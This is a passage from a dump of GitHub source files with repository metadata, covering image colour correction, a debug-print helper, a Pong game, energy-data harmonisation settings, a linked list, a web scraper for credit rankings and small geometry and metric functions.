grid\n\nplt.legend(loc=\"lower right\") # set the legend position\nplt.ylabel('Percentage') # y-axis label\nplt.xlabel('Difference') # x-axis label\n\n#plt.savefig('D:\\\\commonNeighbors_CDF_snapshots.eps', dpi=1000, bbox_inches='tight')\nplt.show()","repo_name":"sg-first/gist.md","sub_path":"gist/matplotlib.py/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74869549484","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 26 11:55:32 2021\r\n\r\n@author: Diloz\r\n\"\"\"\r\nimport cv2\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom scipy import ndimage\r\nfrom scipy import optimize\r\nimport matplotlib.pylab as plt\r\nfrom joblib import Parallel, delayed\r\nfrom Detect_colorChecker import paralell_search\r\n\r\nimport plotting\r\n\r\n# colrLable = ['blu', 'grn', 'red']\r\n# lbl_illum = ['blu_L', 'grn_L', 'red_L']\r\neps = 
np.finfo(float).eps\r\n#%% Obtain Checker\r\ndef getChecker(potCrp, cardBW, search_scale, search_degree, num_cores):\r\n\r\n (H_card, W_card) = cardBW.shape[:2]\r\n gray = cv2.cvtColor(potCrp, cv2.COLOR_BGR2GRAY)\r\n edged = cv2.Canny(gray,30,30)\r\n results = Parallel(n_jobs = num_cores, backend = \"threading\")(delayed(paralell_search)(search_scale, degree, edged, H_card, W_card, cardBW) for degree in search_degree)\r\n maxVal_all, _, _, _ = zip(*results)\r\n \r\n ind = np.argmax(maxVal_all)\r\n maxVal, maxLoc, r, SCALE = results[ind]\r\n deg = search_degree[ind]\r\n \r\n (startX, startY) = (int(round(maxLoc[0]*r)), int(round(maxLoc[1]*r)))\r\n (endX, endY) = (int(round((maxLoc[0] + W_card)*r)), int(round((maxLoc[1] + H_card) * r)))\r\n \r\n if deg != 0:\r\n checkerImg = ndimage.rotate(potCrp, deg)\r\n else:\r\n checkerImg = potCrp\r\n \r\n return checkerImg[startY:endY,startX:endX,:],startY, endY, startX, endX, deg\r\n\r\n#%% 3.1 function:Samples the 70% of the area of every patch on the Macbeth colorChercker\r\n# Calculate the mean RGB color of each patch area\r\n# Calculate the color difference between the sample and ideal value in the LAB color space\r\n# the mode of the sample for the three image channels (RGB)\r\ndef cardSampler(colorChecker, checkIMG, colrLable, posn, rows, cols):\r\n colorTable = colorChecker.loc[:, ['position', 'label', 'red', 'grn', 'blu']]\r\n rowSiz = checkIMG.shape[0] /rows\r\n colSiz = checkIMG.shape[1] /cols\r\n winSiz = int((rowSiz * 0.70)/2)\r\n \r\n cardImg = np.zeros(((2*4*winSiz), (2*6*winSiz), 3), dtype=np.uint8)\r\n cardLabel = np.ones_like(cardImg)\r\n \r\n \r\n for cntRow in range(rows):\r\n crow = int((cntRow + 0.5) * rowSiz)\r\n \r\n for cntCol in range(cols):\r\n ccol = int((cntCol + 0.5) * colSiz)\r\n img_patch = checkIMG[crow-winSiz : crow+winSiz, ccol-winSiz : ccol+winSiz]\r\n cardImg[int(2*winSiz*cntRow): int(2*winSiz*(1+cntRow)),\r\n int(2*winSiz*cntCol): int(2*winSiz*(1+cntCol))] = img_patch\r\n indx = int((cntRow*6) + cntCol)\r\n \r\n labl_patch = np.ones_like(img_patch)\r\n\r\n img_LAB = cv2.cvtColor(img_patch, cv2.COLOR_BGR2LAB)\r\n L = np.mean(img_LAB[:, :, 0])\r\n A = np.mean(img_LAB[:, :, 1])\r\n B = np.mean(img_LAB[:, :, 2])\r\n \r\n diff = colorChecker.loc[indx, ['L', 'A', 'B']].values - [L, A, B]\r\n colorTable.loc[indx, 'delta' + '_' + posn] = np.sqrt(np.sum(diff**2))\r\n \r\n\r\n for cnt2 in range(len(colrLable)):\r\n y0_patch = []\r\n # y0_patch = colorChecker[cnt2, indx]\r\n y0_patch = colorChecker.loc[indx, colrLable[cnt2]]\r\n labl_patch[:, :, cnt2] = labl_patch[:, :, cnt2]*y0_patch \r\n \r\n colorTable.loc[indx, colrLable[cnt2] + '_' + posn] = np.mean(img_patch[:, :, cnt2])\r\n \r\n cardLabel[int(2*winSiz*cntRow): int(2*winSiz*(1+cntRow)),\r\n int(2*winSiz*cntCol): int(2*winSiz*(1+cntCol))] = labl_patch\r\n\r\n return cardImg, cardLabel, colorTable\r\n\r\n\r\n\r\n#%%\r\ndef illum_check(colorChecker, df_main, imgSRC, check_rot, colrLable, imgName):\r\n tableLable = colorChecker.loc[:, ['position', 'label', 'red', 'grn', 'blu']].copy()\r\n colorTableAll = tableLable.copy()\r\n # lbl_illum = [sub + \"_L\" for sub in colrLable]\r\n\r\n height = imgSRC.shape[0]\r\n width = imgSRC.shape[1]\r\n padLeft = 20\r\n \r\n imgPad = np.zeros((height + 100, width + 100 + padLeft, 3), np.uint8) # Image padding\r\n imgPad[0:height, padLeft:width+padLeft] = imgSRC.copy()\r\n \r\n # winCol, winRow = 150, 100\r\n winRow, winCol = 70, 200\r\n \r\n df = df_main.copy()\r\n checkers = df.loc[(df['name']=='Checker')].reset_index(drop=True)\r\n 
checkers_fit = checkers.copy()\r\n\r\n for cnt2 in range(len(checkers)):\r\n colorTable = pd.DataFrame([])\r\n posn, name, top, left, wd, ht = checkers.loc[cnt2, ['position', 'name', \r\n 'top', 'left', 'width', 'height']].values\r\n bottom = top + winRow + ht\r\n right = left+winCol + wd\r\n potCrp = imgPad[top : bottom, left : right]\r\n \r\n sqrsiz = 48\r\n cardBW = np.zeros(((sqrsiz * 4) +1 , (sqrsiz *6) + 1), dtype=np.uint8)\r\n \r\n for row in range(4 + 1):\r\n lineRow = int(sqrsiz * row)\r\n cardBW[lineRow, :] = 255\r\n \r\n for col in range(6 + 1):\r\n lineCol = int(sqrsiz * col)\r\n cardBW[:, lineCol] = 255\r\n \r\n \r\n search_scale = np.linspace(0.8, 1.6, 5)\r\n search_degree = np.linspace(-2.5,2.5,11)\r\n num_cores = 1\r\n\r\n checkerImg, _, _, _, _, _ = getChecker(potCrp, cardBW, \r\n search_scale, search_degree, num_cores)\r\n checkerImg = ndimage.rotate(checkerImg, check_rot)\r\n \r\n cardImg, cardLabel, colorTable = cardSampler(colorChecker, checkerImg, colrLable, posn, rows=4, cols=6)\r\n colorTableAll = pd.concat([colorTableAll, colorTable], axis=1)\r\n colorTableAll = colorTableAll.loc[:, ~colorTableAll.columns.duplicated()] \r\n \r\n illum_img = illum_greyWorld(colorTable, colrLable, posn)\r\n # illum_fit, offset_fit = illum_fitting(cardImg, cardLabel, colrLable)\r\n illum_fit = illum_fitting(cardImg, cardLabel, colrLable)\r\n\r\n checkers.loc[checkers[\"position\"] ==posn, colrLable] = illum_img\r\n checkers_fit.loc[checkers_fit[\"position\"] ==posn, colrLable] = illum_fit\r\n\r\n # magClor = checkers_fit.loc[:, ['blu', 'grn', 'red']].sum(axis=1).values\r\n # checkers_fit.loc[:, \"magClor\"] = magClor\r\n \r\n # for cnt3 in colrLable:\r\n # checkers_fit.loc[:, cnt3 + \"_perc\"] = checkers_fit.loc[:, cnt3] / checkers_fit.loc[:, \"magClor\"]\r\n \r\n \r\n \r\n checkers_fit = addXYZ(checkers_fit)\r\n return checkers, checkers_fit, colorTableAll\r\n\r\n#%%\r\ndef illum_greyWorld(colorTable, colrLable, posn):\r\n BGR_labl = [sub + \"_\" + posn for sub in colrLable]\r\n greyPatch_img = colorTable.loc[colorTable['position'] >=19, BGR_labl]\r\n illum_img = greyPatch_img.mean().values\r\n \r\n return illum_img\r\n\r\n#%%\r\ndef illum_fitting(imgColr, lablColr, colrLable):\r\n cardImg = imgColr.copy()\r\n cardLabel = lablColr.copy()\r\n illum = []\r\n \r\n for cnt in range(len(colrLable)):\r\n illuInitial = (1.0, 0.0)\r\n \r\n y0_card = cardLabel[:,:, cnt].flatten()\r\n y1_card = cardImg[:,:, cnt].flatten()\r\n \r\n indx = np.argsort(y0_card) \r\n y0_card = y0_card[indx]\r\n y1_card = y1_card[indx]\r\n \r\n # Estimate the illuminant of the scene\r\n ErrorFunc = lambda tpl,y0,y1 : (tpl[0]/255) * y0 - y1\r\n l1Final, success = optimize.leastsq(ErrorFunc,illuInitial, args=(y0_card,y1_card), maxfev = 20000)\r\n illum.append(l1Final[0])\r\n \r\n return illum\r\n\r\n#%%\r\n\r\ndef addXYZ(dfColor):\r\n df = dfColor.copy()\r\n \r\n M = np.array([[0.4124564, 0.3575761, 0.1804375],\r\n [0.2126729, 0.7151522, 0.0721750],\r\n [0.0193339, 0.1191920, 0.9503041]])\r\n \r\n for sq in range(len(df)):\r\n RGB_val = df.loc[sq, ['red', 'grn', 'blu']].values\r\n df.loc[sq, ['X', 'Y', 'Z']] = np.matmul(M, RGB_val)\r\n mag = df.loc[sq, ['X', 'Y', 'Z']].sum()\r\n \r\n if mag == 0: mag = eps\r\n \r\n df.loc[sq, ['x', 'y', 'z']] = df.loc[sq, ['X', 'Y', 'Z']].values/mag\r\n # df.loc[sq, ['X', 'Y', 'Z']] = cv2.cvtColor( np.uint8([[RGB_val]] ), cv2.COLOR_RGB2XYZ)[0][0]\r\n df.loc[sq, ['L', 'A', 'B']] = cv2.cvtColor( np.uint8([[RGB_val]] ), cv2.COLOR_RGB2LAB)[0][0]\r\n \r\n # plt.scatter(df.loc[:, 'x'], 
df.loc[:, 'y'])\r\n # plt.xlim(0, 0.8)\r\n # plt.ylim(0, 0.8)\r\n # plt.show()\r\n \r\n return df","repo_name":"diloc/Color_correction","sub_path":"Color_Constancy/checkerCards.py","file_name":"checkerCards.py","file_ext":"py","file_size_in_byte":8358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26741072465","text":"# type: ignore\n\nimport ast\nimport inspect\nimport os\nimport re\nfrom pprint import pformat\n\nglobal count\ncount = 0\n\n\nclass d:\n \"\"\"\n Prints the name, type and the value of the argument(s) passed to it.\n\n Example:\n >>> a = 1\n >>> b = \"hello\"\n >>> c = [1, 2, 3]\n >>> d(a, b, c)\n d [0] > a: int = 1 | b: str = 'hello' | c: list = [1, 2, 3]\n >>> d()\n d [1] > \"path/to/script.py\", line 10\n >>> d(\"some comment\", a, b, c)\n d [2] > (some comment) | a: int = 1 | b: str = 'hello' | c: list = [1, 2, 3]\n \"\"\"\n\n NO_COLOR = os.getenv(\"NO_COLOR\")\n BLUE = \"\" if NO_COLOR else \"\\033[0;34m\"\n BOLD = \"\" if NO_COLOR else \"\\033[1m\"\n CYAN = \"\" if NO_COLOR else \"\\033[0;36m\"\n GREEN = \"\" if NO_COLOR else \"\\033[0;32m\"\n ITALIC = \"\" if NO_COLOR else \"\\033[3m\"\n RED = \"\" if NO_COLOR else \"\\033[0;31m\"\n YELLOW = \"\" if NO_COLOR else \"\\033[0;33m\"\n R = \"\" if NO_COLOR else \"\\033[0m\" # Reset.\n SEP = f\"{RED}|{R}\"\n CTX = re.compile(r\"^d\\s*\\((.+?)\\)$\")\n\n def __init__(self, *args, **kwargs): # sourcery skip: use-named-expression\n if kwargs:\n raise TypeError(\"d() only accepts positional arguments.\")\n if not args:\n self.print_line_no()\n return\n self.args = args\n\n try:\n frame = inspect.currentframe()\n context = inspect.getframeinfo(frame.f_back).code_context[0]\n found = re.search(d.CTX, context.strip())\n if found:\n arg_names = self.get_arg_names(found[0])\n self.print_args(arg_names)\n else:\n raise ValueError(\"d() arg list must not end with a comma.\")\n finally:\n del frame\n\n def get_arg_names(self, src):\n module = ast.parse(src)\n body = module.body[0].value\n names = []\n for node in ast.walk(body):\n if isinstance(node, ast.Call):\n names.extend(ast.unparse(name) for name in node.args)\n return names\n\n def prettify(self, arg):\n pretty = pformat(arg, compact=True, underscore_numbers=True)\n if isinstance(arg, (list, tuple, dict, set)):\n pretty = \"\\ \\n\" + pretty + \"\\n\"\n return pretty\n\n def print_header(self):\n global count\n header = f\"\\n{d.BLUE}d{d.R} [{d.GREEN}{count}{d.R}] >\"\n count += 1\n print(header, end=\" \")\n\n def print_args(self, names):\n self.print_header()\n to_print = []\n for name, arg in zip(names, self.args):\n t = type(arg).__name__\n if isinstance(arg, type):\n t = arg.__name__\n pretty = self.prettify(arg)\n if name.lstrip(\"'\").rstrip(\"'\") == arg:\n to_print.append(f\"({d.ITALIC}{arg}{d.R}) {d.SEP} \")\n else:\n to_print.append(f\"{d.BOLD}{name}{d.R}: {d.YELLOW}{t}{d.R} = {d.CYAN}{pretty}{d.R} {d.SEP} \")\n print(\"\".join(to_print)[: -len(d.SEP) - 1])\n\n def print_line_no(self):\n script_path = inspect.currentframe().f_back.f_back.f_code.co_filename\n line_no = inspect.currentframe().f_back.f_back.f_lineno\n self.print_header()\n print(f\"'{script_path}', line {d.YELLOW}{line_no}{d.R}\")\n\n\na = {\n \"expand\": \"attributes\",\n \"link\": {\"rel\": \"self\", \"href\": \"http://localhost:8095/crowd/rest/usermanagement/1/user?username=my_username\"},\n \"name\": \"my_username\",\n \"first-name\": \"My\",\n \"last-name\": \"Username\",\n \"display-name\": \"My Username\",\n \"email\": 
\"user@example.test\",\n \"password\": {\n \"link\": {\n \"rel\": \"edit\",\n \"href\": \"http://localhost:8095/crowd/rest/usermanagement/1/user/password?username=my_username\",\n }\n },\n \"active\": True,\n \"attributes\": {\n \"link\": {\n \"rel\": \"self\",\n \"href\": \"http://localhost:8095/crowd/rest/usermanagement/1/user/attribute?username=my_username\",\n },\n \"attributes\": [],\n },\n}\n","repo_name":"overflowy/imagedifftool","sub_path":"d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"13432854392","text":"from turtle import Turtle\n\n\nclass Paddle(Turtle):\n def __init__(self, position):\n super().__init__()\n self.shape(\"square\")\n self.penup()\n self.shapesize(1, 5)\n self.goto(position)\n self.color(\"white\")\n self.speed(\"fastest\")\n self.ht()\n\n def paddle_movement(self):\n\n self.setheading(90)\n self.st()\n\n def up(self):\n self.setheading(90)\n self.forward(20)\n\n def down(self):\n self.setheading(270)\n self.forward(20)\n\n\nclass Ball(Turtle):\n def __init__(self):\n super().__init__()\n self.shape(\"circle\")\n self.penup()\n self.color(\"white\")\n self.goto(0, 0)\n self.x_move = 10\n self.y_move = 35\n self.moving_speed = 0.1\n\n def ball_movement(self):\n x_cor = self.xcor() + self.x_move\n y_cor = self.ycor() + self.y_move\n\n self.goto(x_cor, y_cor)\n\n def bounce(self):\n self.y_move *= -1\n\n def paddle_bounce(self):\n self.x_move *= -1\n self.moving_speed *= 0.9\n\n def new_ball(self):\n self.goto(0, 0)\n self.paddle_bounce()\n self.moving_speed = 0.1\n\n\nclass ScoreBoard(Turtle):\n def __init__(self, ):\n super().__init__()\n self.score = 0\n self.color(\"white\")\n self.hideturtle()\n self.penup()\n self.l_score = 0\n self.r_score = 0\n self.update_score()\n\n def update_score(self):\n self.clear()\n self.goto(-100, 240)\n self.write(f\"{self.l_score}\", False, \"center\", (\"courier\", 40, \"normal\"))\n self.goto(100, 240)\n self.write(f\"{self.r_score}\", False, \"center\", (\"courier\", 40, \"normal\"))\n\n def update_r_score(self):\n self.r_score += 1\n print(self.r_score)\n self.update_score()\n\n def update_l_score(self):\n self.l_score += 1\n print(self.l_score)\n self.update_score()\n","repo_name":"NajiCoder/Pong-Game","sub_path":"Pong.py","file_name":"Pong.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29045522839","text":"from ontology.namespaces_definition import bigg_enums\n\n\ndef postal_code_correction_function(b, stations):\n tries = [1, -1]\n if int(b['station_code'][-1]) == 0:\n tries = [1]\n if int(b['station_code'][-1]) == 9:\n tries = [-1]\n for t in tries:\n try:\n test = str(int(b['station_code']) + t).zfill(5)\n return stations['latitude', 'longitude'].loc[test].items()\n except:\n pass\n\nZONE_DICTIONARY = {\n \"ES\": {\n \"file\": \"/Users/eloigabal/Downloads/ES/all-geonames-rdf-clean-ES.txt\",\n \"adms\": [\n (\"province\", \"A.ADM2\", \"AddressProvince\"),\n (\"municipality\", \"A.ADM3\", \"AddressCity\"),\n ]\n },\n \"BG\": {\n \"file\": \"/Users/eloigabal/Downloads/ES/all-geonames-rdf-clean-BG.txt\",\n \"adms\":[\n (\"province\", \"A.ADM1\", \"AddressProvince\"),\n (\"municipality\", \"A.ADM2\", \"AddressCity\")\n ]\n }\n}\n\nWEATHER_STATIONS = {\n \"ES\": {\n \"weather_query\":\n \"\"\"\n Match 
(bs:{bigg}__BuildingSpace)<-[]-(n:{bigg}__Building)-[:{bigg}__hasLocationInfo]->(l:{bigg}__LocationInfo) \n WHERE l.{bigg}__addressPostalCode IS NOT NULL and split(l.uri,\"#\")[0] in {namespaces}\n RETURN bs.uri as subject, l.{bigg}__addressPostalCode as station_code\n \"\"\",\n \"namespaces\": [\"https://icaen.cat\"],\n \"weather_correction_function\": postal_code_correction_function\n },\n \"BG\": {\n \"weather_query\":\n \"\"\"\n Match (bs:{bigg}__BuildingSpace)<-[]-(n:{bigg}__Building)-[:{bigg}__hasLocationInfo]->(l:{bigg}__LocationInfo) \n WHERE split(l.uri,\"#\")[0] in {namespaces}\n RETURN bs.uri as subject, [(l)-[:{bigg}__hasAddressCity{{selected:true}}]->(ad) | ad.geo__name][0] as station_code\n \"\"\",\n \"namespaces\": [\"https://bulgaria.bg\"]\n }\n}\n\nelectricity_agg_cat = [\n {\n \"measured_property\": bigg_enums.EnergyConsumptionGridElectricity,\n \"device_query\": f\"\"\"'bigg__Device' in labels(d) AND d.source='DatadisSource'\"\"\",\n \"freq\": \"PT1H\",\n \"agg_name\": \"totalElectricityConsumption\",\n \"required\": \"true\",\n \"agg_func\": [\"SUM\"]\n }\n]\ngas_agg_cat = [\n {\n \"measured_property\": bigg_enums.EnergyConsumptionGas,\n \"device_query\": f\"\"\"'bigg__Device' in labels(d) AND d.source='NedgiaSource'\"\"\",\n \"freq\": \"\",\n \"agg_name\": \"totalGasConsumption\",\n \"required\": \"true\",\n \"agg_func\": [\"SUM\"]\n }\n]\n\nelectricity_agg_bg = [\n {\n \"measured_property\": bigg_enums.EnergyConsumptionGridElectricity,\n \"device_query\": f\"\"\"'bigg__Device' in labels(d) AND d.source='SummarySource'\"\"\",\n \"freq\": \"P1Y\",\n \"agg_name\": \"totalElectricityConsumption\",\n \"required\": \"true\",\n \"agg_func\": [\"SUM\"]\n }\n]\n\ngas_agg_bg = [\n {\n \"measured_property\": bigg_enums.EnergyConsumptionGas,\n \"device_query\": f\"\"\"'bigg__Device' in labels(d) AND d.source='SummarySource'\"\"\",\n \"freq\": \"P1Y\",\n \"agg_name\": \"totalGasConsumption\",\n \"required\": \"true\",\n \"agg_func\": [\"SUM\"]\n }\n]\n\noutdoor_weather_device_agg = [\n {\n \"measured_property\": bigg_enums.Temperature,\n \"device_query\": f\"\"\"'bigg__WeatherStation' in labels(d)\"\"\",\n \"freq\": \"PT1H\",\n \"agg_name\": \"outdoorTemperature\",\n \"required\": \"true\",\n \"agg_func\": [\"AVG\", \"CDD\", \"HDD\"]\n },\n {\n \"measured_property\": bigg_enums.HumidityRatio,\n \"device_query\": f\"\"\"'bigg__WeatherStation' in labels(d)\"\"\",\n \"freq\": \"PT1H\",\n \"agg_name\": \"outdoorHumidityRatio\",\n \"required\": \"false\",\n \"agg_func\": [\"AVG\"]\n }\n]\n\nDEVICE_AGGREGATORS = {\n \"ES\": {\n \"totalGasConsumption\": gas_agg_cat,\n \"totalElectricityConsumption\": electricity_agg_cat,\n \"externalWeather\": outdoor_weather_device_agg\n },\n \"BG\": {\n \"totalGasConsumption\": gas_agg_bg,\n \"totalElectricityConsumption\": electricity_agg_bg,\n \"externalWeather\": outdoor_weather_device_agg\n }\n}\n\n\nNON_USED_COUNTRIES_IN_BIGG = {\n \"GR\": {\n \"file\": \"/Users/eloigabal/Downloads/ES/all-geonames-rdf-clean-GR.txt\",\n \"adms\": [\n (\"province\", \"A.ADM1\", \"AddressProvince\"),\n (\"municipality\", \"A.ADM3\", \"AddressCity\")\n ]\n },\n \"CZ\": {\n \"file\": \"/Users/eloigabal/Downloads/ES/all-geonames-rdf-clean-CZ.txt\",\n \"adms\": [\n (\"province\", \"A.ADM1\", \"AddressProvince\"),\n (\"municipality\", \"A.ADM3\", \"AddressCity\")\n ]\n 
}\n}\n\n\n","repo_name":"biggproject/Harmonizer","sub_path":"Harmonizer_Cimne/set_up_params.py","file_name":"set_up_params.py","file_ext":"py","file_size_in_byte":4625,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"17916618926","text":"#coding: utf-8\n\nimport math\nearth_redius=6371004\ncons = math.pi/180\n\ndef arc_points(p1,p2):\n x1, y1, x2, y2 = p1 + p2\n rlon1, rlat1, rlon2, rlat2 = float(x1) * cons, float(y1) * cons, float(x2) * cons, float(y2) *cons\n vcos = math.cos(rlat1) * math.cos(rlat2) * math.cos(rlon1 - rlon2) + math.sin(rlat1) * math.sin(rlat2)\n vcos = 1.0 if vcos > 1.0 else (vcos if vcos > -1.0 else -1.0)\n return math.acos(vcos) \n \ndef ll2xyz(p):\n x, y = p[0]*cons, p[1]*cons\n return (math.sin(x)*math.cos(y)*earth_redius, math.cos(x)*math.cos(y)*earth_redius, math.sin(y)*earth_redius)\n\ndef xyz2ll(p):\n x, y, z = p[0]/earth_redius, p[1]/earth_redius, p[2]/earth_redius\n lat = math.asin(z)\n lng = math.asin(x/math.cos(lat))\n \n return (lng/cons, lat/cons)","repo_name":"Cosimzhou/py-truffle","sub_path":"csm/algorithm/geom.py","file_name":"geom.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21994833701","text":"from DoublyLinkedList.node import Node\n\n\nclass DLinkedList:\n\n def __init__(self, data=None):\n if data:\n self.head = self.__create_node__(data)\n else:\n self.head = None\n self.__size = int(self.head is not None)\n\n def get_size(self):\n return self.__size\n\n def insert(self, index, data):\n\n if data is None:\n raise ValueError(\"Data can not be none\")\n\n if index < 0:\n raise ValueError(\"Index can not be a negative number\")\n\n node = self.__create_node__(data)\n current = self.head\n\n if not self.head:\n self.head = node\n\n elif index == 0:\n node.next = current\n current.prev = node\n self.head = node\n\n elif index >= self.__size:\n self.append(data)\n\n else:\n while index > 0:\n current = current.next\n index -= 1\n node.next, node.prev = current, current.prev\n current.prev.next = node\n\n self.__size += 1\n\n def get(self, index):\n current = self.head\n\n if index > self.__size:\n raise IndexError(\"index is larger than list size\")\n\n while index > 0:\n current = current.next\n index -= 1\n\n return current.data\n\n def append(self, data):\n node = self.__create_node__(data)\n\n if not self.head:\n self.head = node\n else:\n current = self.head\n\n while current.next:\n current = current.next\n\n current.next = node\n node.prev = current\n\n self.__size += 1\n\n def delete(self, value):\n current = self.head\n while current:\n if current.data == value:\n break\n current = current.next\n\n if current:\n if not current.prev:\n self.head, self.head.prev = current.next, None\n else:\n if current.next:\n current.prev.next, current.next.prev = current.next, current.prev\n else:\n current.prev.next = None\n self.__size -= 1\n return current\n\n def __str__(self):\n current = self.head\n list_str = \"\"\n while current:\n list_str += f\"{current.data} \"\n current = current.next\n return list_str\n\n @staticmethod\n def __create_node__(data):\n \"\"\"\n A helper method that create Node objects\n\n :param data:\n :return: A Node object\n \"\"\"\n return 
Node(data)\n","repo_name":"bolusarz/Data-Structures","sub_path":"DoublyLinkedList/doubly_linked_list.py","file_name":"doubly_linked_list.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17691102774","text":"import re\nimport time\nimport datetime\nfrom urllib.parse import urlencode\n\nfrom requests import Session\nfrom lxml import etree\n\nfrom utils import init_log, DBClass, get_settings, get_database, request\nfrom settings import headers, index_url, type_mappings\n\nlogger = init_log('my')\nDATABASE, TABLE = get_database()\nDOMAIN, CALCULATE_DATE, RUN_INTERVAL = get_settings()\nheaders['Host'] = re.search('//(.*?)(/|$)', DOMAIN).group(1)\nheaders['Origin'] = DOMAIN\nDB = DBClass(DATABASE, 'sqlserver')\n\n\nclass EvaluationRank(object):\n\n def __init__(self):\n self.session = Session()\n\n self.view_state = None\n self.view_state_generator = None\n self.event_validation = None\n\n def get_parm(self, text):\n self.view_state = re.search('id=\"__VIEWSTATE\" value=\"(.*?)\"', text).group(1)\n self.view_state_generator = re.search('id=\"__VIEWSTATEGENERATOR\" value=\"(.*?)\"', text).group(1)\n self.event_validation = re.search('id=\"__EVENTVALIDATION\" value=\"(.*?)\"', text).group(1)\n\n def parser(self, text: str, query_date: str, score_type: str):\n html = etree.HTML(text)\n\n for tr in html.xpath('//table[@id=\"gridView\"]//tr')[1:]:\n try:\n obj = {\n 'score_type': type_mappings.get(score_type),\n 'ranking': str(tr.xpath('./td[1]')[0].xpath(\"string(.)\")),\n 'company': str(tr.xpath('./td[2]/span/@title')[0]),\n 'organization_code': str(tr.xpath('./td[3]')[0].xpath(\"string(.)\")),\n 'credit_code': str(tr.xpath('./td[4]')[0].xpath(\"string(.)\")),\n 'normal_score': str(tr.xpath('./td[5]')[0].xpath(\"string(.)\")),\n 'promise_score': str(tr.xpath('./td[6]')[0].xpath(\"string(.)\")),\n 'quality_score': str(tr.xpath('./td[7]')[0].xpath(\"string(.)\")),\n 'total_score': str(tr.xpath('./td[8]')[0].xpath(\"string(.)\")),\n 'calculate_date': query_date\n }\n pk = DB.select_condition(\n TABLE,\n 'id',\n [\n ['score_type', '=', obj.get('score_type')],\n ['organization_code', '=', obj.get('organization_code')],\n ['calculate_date', '=', query_date]\n ]\n )\n if pk:\n DB.update_many(TABLE, [obj], [{'id': pk[0][0]}])\n else:\n DB.insert_many(TABLE, [obj])\n except Exception as e:\n logger.error(\n 'parser: query_date={} score_type={} 错误={}'.format(\n query_date, type_mappings.get(score_type), str(e)))\n\n def get_total_page(self, now_date: str, query_date: str, score_type: str) -> int:\n data = {\n '__EVENTTARGET': 'linkBtnQuery',\n '__EVENTARGUMENT': '',\n '__LASTFOCUS': '',\n '__VIEWSTATE': self.view_state,\n '__VIEWSTATEGENERATOR': self.view_state_generator,\n '__VIEWSTATEENCRYPTED': '',\n '__EVENTVALIDATION': self.event_validation,\n 'head1$nowtime': now_date,\n 'id': '',\n 'datetime': '',\n 'FSTYPE': '',\n 'a': score_type,\n 'txtcsepname': '',\n 'txtcsepcode': '',\n 'txtSCOREDATE': query_date,\n 'ddl': 1\n }\n data = urlencode(data).replace(\"+\", \"%2B\").replace(\"/\", \"%2F\").encode('utf8')\n response, status_code = request(self.session, DOMAIN + index_url.format(now_date), 'post', headers,\n data=data)\n self.get_parm(response.text)\n html = etree.HTML(response.text)\n total_page = html.xpath('//span[@id=\"lblpagecount\"]')[0].xpath(\"string(.)\")\n return int(total_page)\n\n def get_html(self, now_date: str, query_date: str, score_type: str, ddl: int):\n print('开始扫描 计算日期={} 类型={} 
页数={}'.format(query_date, type_mappings.get(score_type), ddl))\n logger.info('开始扫描 计算日期={} 类型={} 页数={}'.format(query_date, type_mappings.get(score_type), ddl))\n try:\n data = {\n '__EVENTTARGET': 'ddl',\n '__EVENTARGUMENT': '',\n '__LASTFOCUS': '',\n '__VIEWSTATE': self.view_state,\n '__VIEWSTATEGENERATOR': self.view_state_generator,\n '__VIEWSTATEENCRYPTED': '',\n '__EVENTVALIDATION': self.event_validation,\n 'head1$nowtime': now_date,\n 'id': '',\n 'datetime': '',\n 'FSTYPE': '',\n 'a': score_type,\n 'txtcsepname': '',\n 'txtcsepcode': '',\n 'txtSCOREDATE': query_date,\n 'ddl': ddl\n }\n data = urlencode(data).replace(\"+\", \"%2B\").replace(\"/\", \"%2F\").encode('utf8')\n response, status_code = request(self.session, DOMAIN + index_url.format(now_date), 'post', headers,\n data=data)\n response.encoding = 'gbk'\n self.get_parm(response.text)\n self.parser(response.text, query_date, score_type)\n except Exception as e:\n print(e)\n logger.error(\n '开始扫描 计算日期={} 类型={} 页数={} 错误={}'.format(query_date, type_mappings.get(score_type), ddl, str(e)))\n\n def run(self):\n date_start = datetime.datetime.strptime(CALCULATE_DATE, '%Y-%m-%d')\n date_end = datetime.datetime.now()\n now_date = date_end.strftime('%Y-%m-%d')\n while date_start <= date_end:\n query_date = date_start.strftime('%Y-%m-%d')\n for score_type in type_mappings:\n response, status_code = request(self.session, DOMAIN + index_url.format(now_date), 'get', headers)\n self.get_parm(response.text) # 刷新参数__VIEWSTATE/__VIEWSTATEGENERATOR/__EVENTVALIDATION\n total_page = self.get_total_page(now_date, query_date, score_type)\n for n in range(1, total_page + 1):\n self.get_html(now_date, query_date, score_type, n)\n date_start += datetime.timedelta(days=1)\n\n\ndef main():\n if RUN_INTERVAL:\n while True:\n try:\n EvaluationRank().run()\n except Exception as e:\n print(e)\n finally:\n time.sleep(60 * 60 * int(RUN_INTERVAL))\n else:\n EvaluationRank().run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"star1986xk/HC_evaluation_rank","sub_path":"信用评价_今日排名.py","file_name":"信用评价_今日排名.py","file_ext":"py","file_size_in_byte":6664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21845283154","text":"import numpy as np\nfrom sklearn.metrics import confusion_matrix\n\n\ndef compute_iou(y_pred, y_true):\n labels = [0, 1, 2, 3, 4, 5, 6, 7]\n current = confusion_matrix(y_true, y_pred, labels=labels)\n intersection = np.diag(current)\n ground_truth_set = current.sum(axis=1)\n predicted_set = current.sum(axis=0)\n union = ground_truth_set + predicted_set - intersection\n iou = intersection / 